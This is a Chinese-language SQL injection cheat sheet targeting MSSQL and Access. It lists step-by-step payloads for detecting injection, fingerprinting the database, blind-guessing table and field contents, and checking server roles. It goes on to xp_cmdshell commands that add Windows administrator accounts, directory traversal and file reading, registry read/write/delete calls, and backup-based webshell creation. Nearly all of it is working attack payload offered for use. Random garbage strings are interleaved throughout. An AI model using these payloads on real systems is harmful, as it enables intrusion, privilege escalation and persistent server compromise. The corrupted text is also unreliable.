1.判断是否有注入;and 1=1 ;and 1=2 TVtvuvQ�2K
2.初步判断是否是mssql ;and user>0 T��\6�dm/5
2+�N]P�W\V
3.注入参数是字符'and [查询条件] and ''=' j�?3�wvw6T
T�"}5}6rSG
4.搜索时没过滤参数的'and [查询条件] and '%25'=' X���Swl Tg
?|\�E��R#z
5.判断数据库系统 [\98$��BN�
E�!)xj.aS$
;and (select count(*) from sysobjects)>0 mssql (&Kk7�<�#`
�5FPM`hL�T
;and (select count(*) from msysobjects)>0 access &v�/dj�@ �
4<w�.8rR:A
JQ_sUYh~3�
#>("CAB02T
6.猜数据库 ;and (select Count(*) from [数据库名])>0 � t���wHVv
)�5Q~�I,dP
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 YlJ@�Xp�KM
�lV3x�*4O=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �e�{'��BAj
Wq D4YG��N
9.(1)猜字段的ascii值(access) ��2�G�& a{
9rA0lq�r]5
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "�+R+6<�"�
Pf�Ag�M1��
(2)猜字段的ascii值(mssql) 7�FP��*oN?
$D�~0~gn�~
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 jE.N ev/��
!3c\NbU��
10.测试权限结构(mssql) 1Z��/(G1��
a{'vN9�3�
g]l'�'��7G
)Yh+c�=6
?
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- gS!:+���G%
x}�w�G:�K
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �@�muRxi��
/Vx7�m�F�:
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ]Gre��k<��
Gt8M&�S-;�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,a{�P4B�q�
o=:9y�-n�H
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �7J�D�' )�
D�#�9m\o_�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ?um�;s�-x)
��]�!�W=^!
;and 1=(select IS_MEMBER('db_owner'));-- ihhDO�mUto
U�|�H=Y"pL
^&9z�w\x;z
m�^!Z_]A![
11.添加mssql和系统的帐户 xk9%�F?)��
Pf�")�e,u$
;exec master.dbo.sp_addlogin username;-- <�6%?OJhp�
;exec master.dbo.sp_password null,username,password;-- 58}�U^IW�
M~�Tuj1��?
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p}}R��-D&K
x x��HY+(m
;exec master.dbo.xp_cmdshell 'net user username password �H��*�?t^
Ea�=8}6`�s
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- D=A&�+6B@-
�v� ,i%Q$�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- nSDMOyj+��
zH��72'"w�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- m�+`c�S=-.
n��I?[�rCM
:I.mGH!^��
p�%up�)]?0
12.(1)遍历目录 T���=
8�0,
\i>��?�q��
;create table dirs(paths varchar(100), id int) 3,�_aA�geE
o�"�s)e��h
;insert dirs exec master.dbo.xp_dirtree 'c:\' W�<�h)HhyG
k&�M;,e3v6
;and (select top 1 paths from dirs)>0 {r,.�!;mHu
f=+�mIZ��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) JMC�KcZ%N
�g.�k"]l�P
.��r=4pQ@#
?>��9/#N�v
(2)遍历目录 ��rET\n(AJ
�@W.S6;GA\
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��<q�58uuK
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ^�`�i#���$
^�x��]r`b�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �:I]�Mps<�
B9��_�X;c�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 X;+s���Uj8
~Py`P�'�+�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 a
K[&�V't~
wA� ,��6bj
C$=��%!w�f
~�f2z]JLr:
13.mssql中的存储过程 �O��0x,lq�
�mX"oW_�EK
xp_regenumvalues 注册表根键, 子键 4!�{KWL�`A
Ot0a�p$��&
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 n1��ZbR�V�
�(!u~�CZ;
xp_regread 根键,子键,键值名 ^cC,.Fd�w
�^�'�MT0j
;exec xp_regread c1(R�uP:S
.�|K��yNBn
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 BiL�Y�(1�,
kM l+yli3c
xp_regwrite 根键,子键, 值名, 值类型, 值 ��G<z�wv3�
Em�Wn�%eMN
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 AG
nxY�V"p
f�3�l&3h�C
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 fivw~z|�[@
zy?|O��D�M
xp_regdeletevalue 根键,子键,值名 3@_xBz,I�.
0�(}�t�8lc
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 f].h^��~.q
PA{PD.4D�u
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �d�w>C@c#"
_�gR;=��~S
4&lv6`�G `
D(op�)�]8�
14.mssql的backup创建webshell G�RI�ti9GD
[T4J�{y64Y
use model �/|m�2WxK)
S&5��&];Ag
create table cmd(str image); ]�;�$L &5^
s*�KhF'f�N
insert into cmd(str) values (''); �XAK�s0*J>
h]&GLb&<?�
backup database model to disk='c:\l.asp'; hg]]Ok~cAs
5J.bD)yrP
#6�aW��9GO
4���}ba�SV
15.mssql内置函数 ?T8}K>a� �
w>&�a�Ev/f
;and (select @@version)>0 获得Windows的版本号 q� �s!�j>x
dh�\'<|\K�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa yNJ �B
oar
gnf8��l?M�
;and (select user_name())>0 爆当前系统的连接用户 [Z�wjOi:�)
lN
4oW3QT�
;and (select db_name())>0 得到当前连接的数据库 fCn^=8KOZ�
y3Q��s�v�
!x=~�g"d<&
r EE1sy/#�
16.简洁的webshell wo�{gG�?�B
`:fZ�)$sY�
use model ]� )\Pqn�(
Igt#V;kK"2
create table cmd(str image); LKB$,pR~1l
c9
eM/�*:
insert into cmd(str) values (''); O�c0�a77@�
U�[-o�> W#
backup database model to disk='g:\wwwtest\l.asp';
